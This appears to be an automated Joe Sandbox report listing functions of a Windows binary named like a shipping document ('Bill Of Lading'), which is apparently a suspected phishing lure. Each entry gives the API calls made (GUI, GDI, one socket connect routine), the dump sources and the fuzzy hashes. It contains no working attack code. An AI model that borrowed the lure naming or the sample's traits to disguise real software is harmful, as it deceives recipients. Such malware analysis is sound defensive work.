                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 659298297-0
                                                                                                                      • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                      • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                                                                      • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                      • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                                                                      Function 00447870 Relevance: 7.6, APIs: 5, Instructions: 94windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 004478A7
                                                                                                                      • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                                                                      • GetCursorPos.USER32(?), ref: 00447935
                                                                                                                      • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CursorMenuPopupTrack$Proc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1300944170-0
                                                                                                                      • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                      • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                                                                      • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                      • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                                                                      Function 00448837 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                      • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                      • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                      • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                      • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                        • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                        • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                        • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                        • Part of subcall function 004413F0: SendMessageW.USER32(030D1A80,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                        • Part of subcall function 004413F0: SendMessageW.USER32(030D1A80,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnableMessageSend$LongShow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 142311417-0
                                                                                                                      • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                      • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                                                                      • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                      • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                                                                      Function 00449549 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0044955A
                                                                                                                        • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                                      • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                                                                      • _wcslen.LIBCMT ref: 004495C1
                                                                                                                      • _wcslen.LIBCMT ref: 004495CE
                                                                                                                      • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1843234404-0
                                                                                                                      • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                      • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                                                                      • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                      • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                                                                      Function 00455014 Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                      • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                                                                      • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                      • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                                                                      Function 00445719 Relevance: 7.6, APIs: 5, Instructions: 76windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsWindowVisible.USER32(?), ref: 00445721
                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                                                                      • _wcslen.LIBCMT ref: 004457A3
                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3087257052-0
                                                                                                                      • Opcode ID: 707967777abbcb615846d4014dd15678eb91240126a64b2d293a4799175c36b7
                                                                                                                      • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                                                                      • Opcode Fuzzy Hash: 707967777abbcb615846d4014dd15678eb91240126a64b2d293a4799175c36b7
                                                                                                                      • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                                                                      Function 00459DCF Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsWindow.USER32(00000000), ref: 00459DEF
                                                                                                                      • GetForegroundWindow.USER32 ref: 00459E07
                                                                                                                      • GetDC.USER32(00000000), ref: 00459E44
                                                                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4156661090-0
                                                                                                                      • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                      • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                                                                      • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                      • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                                                                      Function 00464950 Relevance: 7.6, APIs: 5, Instructions: 68networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
                                                                                                                      • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                                                                      • connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
                                                                                                                      • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                                                                      • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 245547762-0
                                                                                                                      • Opcode ID: c11d93ef0e5925fc7b778e12926c76e847d2ba71e7f4531691fb5523561cfb0e
                                                                                                                      • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                                                                      • Opcode Fuzzy Hash: c11d93ef0e5925fc7b778e12926c76e847d2ba71e7f4531691fb5523561cfb0e
                                                                                                                      • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                                                                      Function 0044710F Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                      • BeginPath.GDI32(?), ref: 004471B7
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2338827641-0
                                                                                                                      • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                      • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                                                                      • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                      • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                                                                      Function 0043770A Relevance: 7.6, APIs: 5, Instructions: 56sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2875609808-0
                                                                                                                      • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                      • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                                                                      • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                      • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                                                                      Function 0046FCC6 Relevance: 7.5, APIs: 5, Instructions: 49windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32 ref: 0046FD00
                                                                                                                      • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                                                                      • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                                                                      • DestroyIcon.USER32(?), ref: 0046FD58
                                                                                                                      • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$DestroyIcon
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3419509030-0
                                                                                                                      • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                                      • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                                                                      • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                                      • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                                                                      Function 004175A2 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __getptd.LIBCMT ref: 004175AE
                                                                                                                        • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                                        • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                                      • __amsg_exit.LIBCMT ref: 004175CE
                                                                                                                      • __lock.LIBCMT ref: 004175DE
                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                                                                                      • InterlockedIncrement.KERNEL32(030D2D00), ref: 00417626
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4271482742-0
                                                                                                                      • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                      • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                                                                      • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                      • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                                                                      Function 004555B8 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4023252218-0
                                                                                                                      • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                      • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                                                                      • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                      • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                                                                      Function 0046032B Relevance: 7.5, APIs: 5, Instructions: 43windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                                                                      • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                                                                      • MessageBeep.USER32(00000000), ref: 0046036D
                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                                                                      • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3741023627-0
                                                                                                                      • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                      • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                                                                      • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                      • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
